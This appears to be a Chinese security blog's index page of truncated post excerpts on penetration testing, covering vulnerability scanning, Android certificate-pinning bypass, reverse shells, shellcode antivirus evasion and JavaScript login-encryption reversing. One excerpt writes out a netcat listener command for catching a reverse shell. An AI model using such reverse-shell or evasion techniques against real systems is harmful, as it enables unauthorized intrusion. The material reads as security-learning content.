seo优化_前端开发_渗透技术

2022-04-18hush阅读(97)赞(0)

渗透测试收集信息完成后，就要根据所收集的信息，扫描目标站点可能存在的漏洞了，包括我们之前提到过的如：SQL注入漏洞、跨站脚本漏洞、文件上传漏洞、文件包含漏洞及命令执行漏洞等，通过这些已知的漏洞，来寻找目标站点的突破口，在这之前我们可能就已经...

2022-04-17hush阅读(88)赞(0)

0x0 前言 本文将通过一个Demo APP实现Android中各种HTTPS证书认证，并尝试通过各种方式绕过证书校验和证书绑定。目的是自我总结与知识点回顾，如果你正在学习这方面的知识，那这篇文章能帮助你从实践中体会Android APP中...

2022-04-16hush阅读(130)赞(0)

1、实验环境 Kali:192.168.32.132 //模拟靶机 Windows:192.168.32.1 //模拟公网vps 2、若靶机上存在nc，获取反向shell： vps攻击机：nc -lvp 9999 // 监听9999端口 靶...

2022-04-15hush阅读(90)赞(0)

现在的shellcode分离免杀，远程内存加载已经很流行也比较实用了，基本被杀了改改又可以过，本篇分享下最近的一次免杀的思路，主要是思路，遇到一个点如何去对下一步进行处理。 用到的工具： 1. VC6.0++ 2. 一款源码控 3. 辅助工...

2022-04-14hush阅读(85)赞(0)

又是一个深夜，记录前段时间测试的过程。唉，每次小有所学就要懈怠一会。全文高强度打码。 0x00 一个登录框 使用google hacking语法，翻了一翻，锁定了目标范围内一个看起来普普通通的登录页面。 aspx写的页面，应该是Window...

2022-04-13hush阅读(89)赞(0)

本次接到一个hvv前的渗透测试项目，一家互联网金融，今年是第二年给他们家做测试，项目完成后，复盘时觉得还是有一些东西是可以记录一下的。 项目总体情况 该厂家资产较多，前期搜集到的资产大概有100多个，大部分为Springboot开发，有阿里...

2022-04-05hush阅读(107)赞(0)

Python 的 import 是非常直观的，但即使这样，有时候你会发现，明明包就在那里，我们仍会遇到 ModuleNotFoundError，明明相对路径非常正确，就是报错 ImportError: attempted relative ...

2022-04-04hush阅读(105)赞(0)

目标网站：aHR0cHM6Ly9tLmN0eXVuLmNuL3dhcC9tYWluL2F1dGgvbG9naW4/cmVkaXJlY3Q9JTJGbXk= 寻找加密函数入口 输入邮箱、密码点击登录抓取请求信息（user@163.com、65...

2022-04-03hush阅读(134)赞(0)

0x01 Netbios协议探测 1.1 netbios简介 IBM公司开发，主要用于数十台计算机的小型局域网。该协议是一种在局域网上的程序可以使用的应用程序编程接口（API），为程序提供了请求低级服务的同一的命令集，作用是为了给局域网提供...

2022-04-02hush阅读(90)赞(0)

起因 白帽子们挖Web漏洞时，JavaScript信息是至关重要的一环 从JS中可以得到隐藏接口等信息，然后尝试挖掘越权，SQL注入和上传等洞 笔者刚入门时候曾用这种办法挖到了一些CNVD，算是收获颇丰 回到主题，审计JS能够获得重要信息，...